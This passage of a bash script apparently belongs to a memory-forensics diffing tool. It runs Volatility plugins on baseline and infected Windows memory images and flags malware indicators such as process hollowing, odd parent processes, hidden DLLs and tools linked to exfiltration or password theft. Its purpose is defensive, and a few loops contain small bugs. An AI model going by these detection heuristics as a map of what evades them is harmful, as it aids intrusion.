  ################################ RUNNING VOLATILITY PLUGINS ################################
  echo -e "Running a selection of volatility plugins (time consuming)..."
  for plugin in "{plugins_to_run[@]}" 
  do
    echo -e "Volatility plugin "$plugin" execution in progress..."
    mkdir $output_dir/$plugin
    if [[ $plugin = "mutantscan" ]] || [[ $plugin = "handles" ]] || [[ $plugin = "privs" ]]  || [[ $plugin = "envars" ]] ; then
      vol.py --profile=$profile -f $baseline_memory_image $plugin --silent &> $output_dir/$plugin/baseline-$plugin.txt &
      vol.py --profile=$profile -f $infected_memory_image $plugin --silent &> $output_dir/$plugin/infected-$plugin.txt &
      wait
    elif [[ $plugin = "orphanthreads" ]]  ; then
      vol.py --profile=$profile -f $baseline_memory_image threads -F OrphanThread &> $output_dir/orphanthreads/baseline-orphanthreads.txt &
      vol.py --profile=$profile -f $infected_memory_image threads -F OrphanThread &> $output_dir/orphanthreads/infected-orphanthreads.txt &
      wait
    elif [[ $plugin = "psxview" ]]  ; then
      vol.py --profile=$profile -f $baseline_memory_image psxview -R &> $output_dir/psxview/baseline-psxview.txt &
      vol.py --profile=$profile -f $infected_memory_image psxview -R &> $output_dir/psxview/infected-psxview.txt &
      wait
    elif [[ $plugin = "malfind" ]] ; then
      mkdir $output_dir/$plugin/dump-dir-baseline
      mkdir $output_dir/$plugin/dump-dir-infected
      vol.py --profile=$profile -f $baseline_memory_image $plugin -D $output_dir/$plugin/dump-dir-baseline &> $output_dir/$plugin/baseline-$plugin.txt &
      vol.py --profile=$profile -f $infected_memory_image $plugin -D $output_dir/$plugin/dump-dir-infected &> $output_dir/$plugin/infected-$plugin.txt &
      wait
    else
      vol.py --profile=$profile -f $baseline_memory_image $plugin &> $output_dir/$plugin/baseline-$plugin.txt &
      vol.py --profile=$profile -f $infected_memory_image $plugin &> $output_dir/$plugin/infected-$plugin.txt &
      wait
    fi
  done
  wait

  ################################ DIFFING VOLATILITY RESULTS ################################
  echo -e "Diffing output results..."
  for plugin in "{plugins_to_run[@]}"
  do
    diff $output_dir/$plugin/baseline-$plugin.txt $output_dir/$plugin/infected-$plugin.txt | grep -E "^>" | sed 's/^..//' &> $output_dir/$plugin/diff-$plugin.txt
  done

  ################################ DUMPING NEW PROCESSES TO DISK ################################
  echo -e "Dumping new processes to disk..."
  cat $output_dir/psscan/diff-psscan.txt | tr -s ' ' | cut -d " " -f 3 | sort | uniq >  $output_dir/tmpfolder/new-procpids.tmp
  mkdir $output_dir/procdump
  while read newpid ; do
    vol.py --profile=$profile -f $infected_memory_image procdump -D $output_dir/procdump/ -p $newpid &> /dev/null
  done < $output_dir/tmpfolder/new-procpids.tmp
  wait


  if [[ $@ =~ "--malware-checks" ]] ; then
    touch $output_dir/tmpfolder/malware-checks.tmp
    echo -e "Hunting for process anomalies..."

    ################################ MALWARE CHECKS - NETWORK ################################

    # compute unique IPs from netscan output:
    cat $output_dir/netscan/diff-netscan.txt | grep -o -E "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | sort | uniq | grep -v -E "127\.0\.0\.1|0\.0\.0\.0" > $output_dir/tmpfolder/netscan-uniq-ips.tmp
    if [[ -s $output_dir/tmpfolder/netscan-uniq-ips.tmp ]]; then
      echo -e "\n\nUnique IP addresses from netscan output." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/netscan-uniq-ips.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    ################################ MALWARE CHECKS - PROCESS ANOMALIES ################################

    # verify PID of System process = 4
    cat $output_dir/psscan/infected-psscan.txt | grep " System " | tr -s ' ' | cut -d " " -f 3 > $output_dir/tmpfolder/system-pids.tmp
    while read pid; do
      if [[ $pid != "4" ]] ; then
        echo -e "\nSuspicious 'System' process running with PID $pid (expected PID is 4)." >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    done < $output_dir/tmpfolder/system-pids.tmp

    # verify that only one instance of certain processes is running:
    for process in " services.exe" " System" " wininit.exe" " smss.exe" " lsass.exe" " lsm.exe" " explorer.exe"; do
      if [[ "$(cat $output_dir/psscan/infected-psscan.txt | grep $process | wc -l)" != "1" ]] ; then
        echo -e "\n\nMultiple instances of$process were detected." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        sed -n '2p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
        sed -n '3p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
        cat $output_dir/psscan/infected-psscan.txt | grep $process >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    done

    # verify that some processes do not have a child:
    for process in "lsass.exe" "lsm.exe"; do
      cat $output_dir/psscan/infected-psscan.txt | grep $process | tr -s ' ' | cut -d " " -f 3 >> $output_dir/tmpfolder/cpids.tmp
    done
    cat $output_dir/psscan/infected-psscan.txt | tr -s ' ' | cut -d " " -f 4 >> $output_dir/tmpfolder/ppids.tmp
    while read pid; do
      while read ppid; do
        if [[ "$pid" == "$ppid" ]]; then
          echo -e "\n\nProcess with (PID $ppid) is not supposed to be a parent." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '2p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '3p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
          cat $output_dir/psscan/infected-psscan.txt | grep " $ppid " >> $output_dir/tmpfolder/malware-checks.tmp
        fi
      done < $output_dir/tmpfolder/ppids.tmp
    done < $output_dir/tmpfolder/cpids.tmp

    # verify child/parent process relationships:
    for child in " svchost.exe" " smss.exe" " conhost.exe" " audiodg.exe" " services.exe" " lsass.exe" " lsm.exe" " taskhost.exe" " spoolsv.exe" " sppsvc.exe" " taskhost.exe" " mscorsvw.exe" " TPAutoConnSvc" " SearchIndexer" " WmiPrvSE.exe" ; do
      if [[ $child = " sppsvc.exe" ]] || [[ $child = " taskhost.exe" ]] || [[ $child = " mscorsvw.exe" ]] || [[ $child = " TPAutoConnSvc" ]] || [[ $child = " SearchIndexer" ]] || [[ $child = " svchost.exe" ]] || [[ $child = " taskhost.exe" ]] || [[ $child = " spoolsv.exe" ]] ; then parent=" services.exe"; fi
      if [[ $child = " smss.exe" ]]; then parent=" System"; fi
      if [[ $child = " conhost.exe" ]]; then parent=" csrss.exe"; fi
      if [[ $child = " WmiPrvSE.exe" ]] || [[ $child = " audiodg.exe" ]] ; then parent=" svchost.exe"; fi
      if [[ $child = " services.exe" ]] || [[ $child = " lsass.exe" ]] || [[ $child = " lsm.exe" ]]; then parent=" wininit.exe"; fi
      if grep $child $output_dir/psscan/infected-psscan.txt > /dev/null ; then
        if [[ "$(cat $output_dir/psscan/infected-psscan.txt | grep $parent | wc -l)" = "1" ]] ; then
          cat $output_dir/psscan/infected-psscan.txt | grep $child | tr -s ' ' | cut -d " " -f 4 > $output_dir/tmpfolder/child-ppids.tmp
          parent_pid="$(cat $output_dir/psscan/infected-psscan.txt | grep $parent | tr -s ' ' | cut -d ' ' -f 3)"
          while read ppid; do
            ppid=$( printf $ppid )
            parent_pid=$( printf $parent_pid )
            if [[ $ppid != $parent_pid ]] ; then
              tail -n +4 $output_dir/psscan/infected-psscan.txt | tr -s ' ' | cut -d ' ' -f 2-3 | grep -i " "$ppid | cut -d ' ' -f 1 | sort | uniq > $output_dir/tmpfolder/ppidprocess.tmp
              if [[ -s $output_dir/tmpfolder/ppidprocess.tmp ]] ; then   
                ppidlines=`cat $output_dir/tmpfolder/ppidprocess.tmp | wc -l`  &> /dev/null
                if [[ $ppidlines = 1 ]] ; then
                  echo -e "\n\nUnexpected parent process for$child: PPID $ppid (`cat $output_dir/tmpfolder/ppidprocess.tmp`) instead of PPID $parent_pid ($parent )." >> $output_dir/tmpfolder/malware-checks.tmp
                  echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
                  sed -n '2p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                  sed -n '3p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                  cat $output_dir/psscan/infected-psscan.txt | grep " $ppid " >> $output_dir/tmpfolder/malware-checks.tmp
                else
                  cat $output_dir/tmpfolder/ppidprocess.tmp | tr '\n' ' ' > $output_dir/tmpfolder/ppparents.tmp
                  echo -e "\n\nUnexpected parent process for$child: PPID $ppid ( multiple associated processes: `cat $output_dir/tmpfolder/ppparents.tmp`) instead of PPID $parent_pid ($parent )." >> $output_dir/tmpfolder/malware-checks.tmp
                  echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
                  sed -n '2p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                  sed -n '3p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                  cat $output_dir/psscan/infected-psscan.txt | grep " $ppid " >> $output_dir/tmpfolder/malware-checks.tmp
                fi
              else
                echo -e "\n\nUnexpected parent process for$child: PPID $ppid (could not map associated process name) instead of PPID $parent_pid ($parent )." >> $output_dir/tmpfolder/malware-checks.tmp
                echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
                sed -n '2p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                sed -n '3p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                cat $output_dir/psscan/infected-psscan.txt | grep " $ppid " >> $output_dir/tmpfolder/malware-checks.tmp
              fi
            fi     
          done < $output_dir/tmpfolder/child-ppids.tmp
        fi
      fi
    done

    # verify that every process has a parent (except for explorer.exe, csrss.exe, wininit.exe and winlogon.exe)
    mkdir $output_dir/tmpfolder/ppids
    tail -n +4 $output_dir/psscan/infected-psscan.txt | tr -s ' ' | cut -d ' ' -f 4 | sort | uniq | grep -v "^0$" > $output_dir/tmpfolder/ppids/ppids.temp
    tail -n +4 $output_dir/psscan/infected-psscan.txt | tr -s ' ' | cut -d ' ' -f 3 | sort | uniq > $output_dir/tmpfolder/ppids/pids.temp
    while read ppid; do 
      if ! grep -E "^$ppid$" $output_dir/tmpfolder/ppids/pids.temp > /dev/null ; then
        tail -n +4 $output_dir/psscan/infected-psscan.txt | tr -s ' ' | cut -d ' ' -f 2,3,4 | grep -E " $ppid$" | cut -d ' ' -f 1 | sort | uniq > $output_dir/tmpfolder/ppids/processes-$ppid.temp
        cat $output_dir/tmpfolder/ppids/processes-$ppid.temp | tr '\n' ' ' > $output_dir/tmpfolder/ppids/processes-$ppid-space.temp
        if  ! grep -E -i "explorer.exe|csrss.exe|wininit.exe|winlogon.exe" $output_dir/tmpfolder/ppids/processes-$ppid-space.temp > /dev/null ; then 
          echo -e "\n\nPPID $ppid does not have an associated process." >> $output_dir/tmpfolder/malware-checks.tmp
          echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '2p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '3p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
          cat $output_dir/psscan/infected-psscan.txt | grep " $ppid " >> $output_dir/tmpfolder/malware-checks.tmp
        fi 
      fi
    done < $output_dir/tmpfolder/ppids/ppids.temp

    # verify processes are running in expected sessions:
    for process in " wininit.exe" " services.exe" " lsass.exe" " svchost.exe" " lsm.exe" " winlogon.exe" ; do
      if [[ $process = " csrss.exe" ]] || [[ $process = " wininit.exe" ]] || [[ $process = " services.exe" ]] || [[ $process = " lsass.exe" ]] || [[ $process = " svchost.exe" ]]|| [[ $process = " lsm.exe" ]]; then session="0" ; fi
      if [[ $process = " winlogon.exe" ]]; then session="1" ; fi
      cat $output_dir/pslist/infected-pslist.txt | grep $process | tr -s ' ' | cut -d ' ' -f 7 > $output_dir/tmpfolder/process_sessions.tmp
      while read psession ; do
        if [[ $psession != $session ]] ; then
          echo -e "\n\nProcess$process running in unexpected session ($psession instead of $session)." >> $output_dir/tmpfolder/malware-checks.tmp
          echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '2p' $output_dir/pslist/infected-pslist.txt >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '3p' $output_dir/pslist/infected-pslist.txt >> $output_dir/tmpfolder/malware-checks.tmp
          cat $output_dir/pslist/infected-pslist.txt | grep $process >> $output_dir/tmpfolder/malware-checks.tmp
        fi
      done < $output_dir/tmpfolder/process_sessions.tmp
    done

    # check process executable path:
    for process in "smss.exe" "crss.exe" "wininit.exe" "services.exe" "lsass.exe" "svchost.exe" "lsm.exe" "explorer.exe" "winlogon"; do
      if [[ $process == "smss.exe" ]]; then processpath="\systemroot\system32\smss.exe" ; fi
      if [[ $process == "crss.exe" ]]; then processpath="\windows\system32\csrss.exe" ; fi
      if [[ $process == "wininit.exe" ]]; then processpath="\windows\system32\wininit.exe" ; fi
      if [[ $process == "services.exe" ]]; then processpath="\windows\system32\services.exe" ; fi
      if [[ $process == "lsass.exe" ]]; then processpath="\windows\system32\lsass.exe" ; fi
      if [[ $process == "svchost.exe" ]]; then processpath="\windows\system32\svchost.exe" ; fi
      if [[ $process == "lsm.exe" ]]; then processpath="\windows\system32\lsm.exe" ; fi
      if [[ $process == "explorer.exe" ]]; then processpath="\windows\explorer.exe" ; fi
      if [[ $process == "winlogon.exe" ]]; then processpath="\windows\system32\winlogon.exe" ; fi
      if [[ $process == "sppsvc.exe" ]]; then processpath="\windows\system32\sppsvc.exe" ; fi
      cat $output_dir/dlllist/infected-dlllist.txt | grep -i -A 1 $process | grep "Command line" | grep -o '\\.*' | cut -d ' ' -f 1 | tr '[:upper:]' '[:lower:]' | sed 's,\\,\\\\,g' > $output_dir/tmpfolder/path_list.tmp
      if [[ -s $output_dir/tmpfolder/path_list.tmp ]]; then
        while read path; do
          if [[ "$path" != "$processpath" ]]; then
            echo -e "\n\nProcess running from unusual path." >> $output_dir/tmpfolder/malware-checks.tmp
            echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
            echo -e "Process $process is running from $path instead of $processpath" >> $output_dir/tmpfolder/malware-checks.tmp
          fi
        done < $output_dir/tmpfolder/path_list.tmp
      fi
    done

    # verify if any processes have suspicious l33t names:
    cat $output_dir/psscan/infected-psscan.txt | grep -E -i $l33t_process_name > $output_dir/tmpfolder/suspicious_process.tmp
    if [[ -s $output_dir/tmpfolder/suspicious_process.tmp ]]; then
      echo -e "\n\nProcesses with suspicious names." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/suspicious_process.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # verify if any hacker tools were used in process list:
    cat $output_dir/psscan/infected-psscan.txt | grep -E -i $hacker_process_regex > $output_dir/tmpfolder/suspicious_tools.tmp
    if [[ -s $output_dir/tmpfolder/suspicious_tools.tmp ]]; then
      echo -e "\n\nProcesses that may have been used for lateral movement, exfiltration etc." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/suspicious_tools.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # detect process hollowing:
    mkdir $output_dir/tmpfolder/hollowing
    vol.py --profile=$profile -f $infected_memory_image procdump -u -D $output_dir/tmpfolder/hollowing/ &> /dev/null
    cat $output_dir/psscan/infected-psscan.txt | tr -s ' ' | cut -d ' ' -f 2 | cut -d '.' -f 1 | sort | uniq > $output_dir/tmpfolder/process-names.tmp
    tail -n +4 $output_dir/tmpfolder/process-names.tmp > $output_dir/tmpfolder/procnames.tmp
    while read process ; do
      cat $output_dir/psscan/infected-psscan.txt | grep -i $process | tr -s ' ' | cut -d ' ' -f 3 > $output_dir/tmpfolder/$process-pids.tmp
      touch $output_dir/tmpfolder/$process-size.tmp
      while read pid ; do
        ls -l $output_dir/tmpfolder/hollowing/ | tr -s ' ' | cut -d ' ' -f5,9 | grep -i "executable.$pid.exe" | cut -d ' ' -f 1 >> $output_dir/tmpfolder/$process-size.tmp
      done < $output_dir/tmpfolder/$process-pids.tmp
      cat $output_dir/tmpfolder/$process-size.tmp | uniq > $output_dir/tmpfolder/$process-size-uniq.tmp
      lines=`wc -l < $output_dir/tmpfolder/$process-size-uniq.tmp`
      if [[ $lines != 1 ]] && [[ $lines != 0 ]]  ; then 
        echo -e "\n\nPotential process hollowing detected in $process (based on size)." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "Process    PID  Size" >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "-----------------------------------" >> $output_dir/tmpfolder/malware-checks.tmp
        while read pid ; do
          echo -e "$process    $pid  `ls -l $output_dir/tmpfolder/hollowing/ | tr -s ' ' | cut -d ' ' -f5,9 | grep -i "executable.$pid.exe" | cut -d ' ' -f 1`" >> $output_dir/tmpfolder/malware-checks.tmp
        done < $output_dir/tmpfolder/$process-pids.tmp   
      fi
    done < $output_dir/tmpfolder/procnames.tmp

    # detect processes with exit time but active threads:
    cat $output_dir/psxview/diff-psxview.txt | tr -s ' ' | cut -d ' ' -f 1,2,6,13 | grep "UTC" | grep "True" | cut -d ' ' -f 1 > $output_dir/tmpfolder/exit_with_threads.tmp
    if [[ -s $output_dir/tmpfolder/exit_with_threads.tmp ]]; then
      echo -e "\n\nProcess(es) with exit time and active threads running." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/psxview/infected-psxview.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/psxview/infected-psxview.txt >> $output_dir/tmpfolder/malware-checks.tmp
      while read procname ; do 
        cat $output_dir/psxview/diff-psxview.txt | grep $procname >> $output_dir/tmpfolder/malware-checks.tmp
      done < $output_dir/tmpfolder/exit_with_threads.tmp
    fi

    # check if any process has domain or enterprise admin privileges:
    cat $output_dir/getsids/diff-getsids.txt | egrep '(Domain Admin|Enterprise Admin|Schema Admin)' > $output_dir/tmpfolder/suspicious_privlege.tmp
    if [[ -s $output_dir/tmpfolder/suspicious_privlege.tmp ]]; then
      echo -e "\n\nProcess(es) with domain or enterprise admin privileges." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/suspicious_privlege.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # check if any process has debug privileges:
    cat $output_dir/privs/diff-privs.txt | grep -i "debug" > $output_dir/tmpfolder/debug_privs.tmp
    if [[ -s $output_dir/tmpfolder/debug_privs.tmp ]]; then
      echo -e "\n\nProcess(es) with debug privileges." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/privs/infected-privs.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/privs/infected-privs.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/debug_privs.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # check if any process has a raw socket handle:
    cat $output_dir/handles/diff-handles.txt | grep -F "\Device\RawIp" > $output_dir/tmpfolder/raw_socket.tmp
    if [[ -s $output_dir/tmpfolder/raw_socket.tmp ]]; then
      echo -e "\n\nRaw socket handles." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/handles/infected-handles.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/handles/infected-handles.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/raw_socket.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # check if any process has a handle to a remote mapped share:
    cat $output_dir/handles/diff-handles.txt | grep -F "\\\\Device\\\\(LanmanRedirector|Mup)" > $output_dir/tmpfolder/remote_shares.tmp
    if [[ -s $output_dir/tmpfolder/remote_shares.tmp ]]; then
      echo -e "\n\nRemote share handles." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/handles/infected-handles.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/handles/infected-handles.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/remote_shares.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    ################################ MALWARE CHECKS - DLLs ################################

    # find suspicious new DLLs (dlllist):
    cat $output_dir/dlllist/diff-dlllist.txt | grep -o -E "C:.*.dll" | grep -v -i "System32" | uniq | sort > $output_dir/tmpfolder/dlls.tmp
    if [[ -s $output_dir/tmpfolder/dlls.tmp ]] ; then
      echo -e "\n\nNew DLLs (dlllist)." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/dlls.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find new dlls (atoms):
    cat $output_dir/atoms/diff-atoms.txt | grep -i -E ".dll$"  >> $output_dir/tmpfolder/atoms.tmp
    if [[ -s $output_dir/tmpfolder/atoms.tmp ]] ; then
      echo -e "\n\nNew DLLs (atoms)." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/atoms/infected-atoms.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/atoms/infected-atoms.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/atoms.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find new dlls (atomscan):
    cat $output_dir/atomscan/diff-atomscan.txt | grep -i -E ".dll$"  >> $output_dir/tmpfolder/atomscan.tmp
    if [[ -s $output_dir/tmpfolder/atomscan.tmp ]] ; then
      echo -e "\n\nNew DLLs (atomscan)." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/atomscan/infected-atomscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/atomscan/infected-atomscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/atomscan.tmp >> $output_dir/tmpfolder/malware-checks.tmp
      if [[ $@ =~ "--add-hints" ]] ; then
        echo -e "\nHint: The DLLs above were potentially injected to genuine processes." >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    fi

    # highlight new hidden DLLs (ldrmodules):
    cat $output_dir/ldrmodules/diff-ldrmodules.txt | grep "False" | grep -E -v -i "system32|explorer.exe|iexplore.exe|.fon$" | sort | uniq > $output_dir/tmpfolder/ldrmodules.tmp
    if [[ -s $output_dir/tmpfolder/ldrmodules.tmp ]] ; then
      echo -e "\n\nSuspicious new ldrmodules entries." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/ldrmodules/infected-ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/ldrmodules/infected-ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/ldrmodules.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find highly suspicious DLLs used for password stealing (ldrmodules):
    cat $output_dir/ldrmodules/diff-ldrmodules.txt | grep -E -i $hacker_dll_regex | sort | uniq > $output_dir/tmpfolder/ldrmodule_hacker.tmp
    if [[ -s $output_dir/tmpfolder/ldrmodule_hacker.tmp ]] ; then
      echo -e "\n\nNew DLLs that may have been used for password theft." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/ldrmodules/infected-ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/ldrmodules/infected-ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/ldrmodule_hacker.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find DLLs with no path / no name (indicates process hollowing) (ldrmodules):
    cat $output_dir/ldrmodules/diff-ldrmodules.txt | grep -E -i "no name" | sort | uniq > $output_dir/tmpfolder/ldrmodule_hollow.tmp
    if [[ -s $output_dir/tmpfolder/ldrmodule_hollow.tmp ]] ; then
      echo -e "\n\nNew DLLs with no path/name (indicates process hollowing)." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/ldrmodules/infected-ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/ldrmodules/infected-ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/ldrmodule_hollow.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    ################################ MALWARE CHECKS - FILES ################################

    # find DLLs/EXES loaded from temp folders (dlllist):
    cat $output_dir/dlllist/diff-dlllist.txt | grep -E -i "TMP|TEMP|AppData" | sort | uniq > $output_dir/tmpfolder/dlllist_temp.tmp
    if [[ -s $output_dir/tmpfolder/dlllist_temp.tmp ]] ; then
      echo -e "\n\nNew DLLs/EXEs loaded from temp folders." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/dlllist_temp.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find hidden DLLs/EXES (ldrmodules):
    cat $output_dir/ldrmodules/diff-ldrmodules.txt | grep -E -i "False  False  False" | sort | uniq | grep -E -i ".dll$|.exe$" > $output_dir/tmpfolder/ldrmodule_hidden.tmp
    if [[ -s $output_dir/tmpfolder/ldrmodule_hidden.tmp ]] ; then
      echo -e "\n\nNew hidden DLLs/EXEs (ldrmodules)." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/ldrmodules/infected-ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/ldrmodules/infected-ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/ldrmodule_hidden.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # highlight new suspicious files (filescan):
    cat $output_dir/filescan/diff-filescan.txt | grep -E -i "\\ProgramData|\\Recycle|\\Windows\\Temp|\\Users\\All|\\Users\\Default|\\Users\\Public|\\ProgramData|AppData" | sort | uniq | grep -v -E ".db$|.lnk$|.ini$|.log$" | tr -s ' ' | cut -d ' ' -f 5 | sort | uniq >> $output_dir/tmpfolder/filescan.tmp
    if [[ -s $output_dir/tmpfolder/filescan.tmp ]] ; then
      echo -e "\n\nNew files on disk." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/filescan.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # highlight prefetch files:
    cat $output_dir/mftparser/diff-mftparser.txt | grep \.pf$ | awk '{print $NF}' | sort | uniq > $output_dir/tmpfolder/prefetch.tmp
    if [[ -s $output_dir/tmpfolder/prefetch.tmp ]]; then
      echo -e "\n\nNew prefetch artifacts." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/prefetch.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # highlight binaries loaded from TEMP folders:
    cat $output_dir/envars/diff-envars.txt | grep -i "TEMP" > $output_dir/tmpfolder/temp_envars.tmp
    if [[ -s $output_dir/tmpfolder/temp_envars.tmp ]]; then
      echo -e "\n\nPossible binaries loaded from TEMP folders." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/envars/infected-envars.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/envars/infected-envars.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/temp_envars.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find suspicious new executables (dlllist):
    cat $output_dir/dlllist/diff-dlllist.txt | grep "Command line" | grep -E -v -i "system32|explorer.exe|iexplore.exe" | sed -e 's/Command line : //' | sort | uniq > $output_dir/tmpfolder/execs.tmp
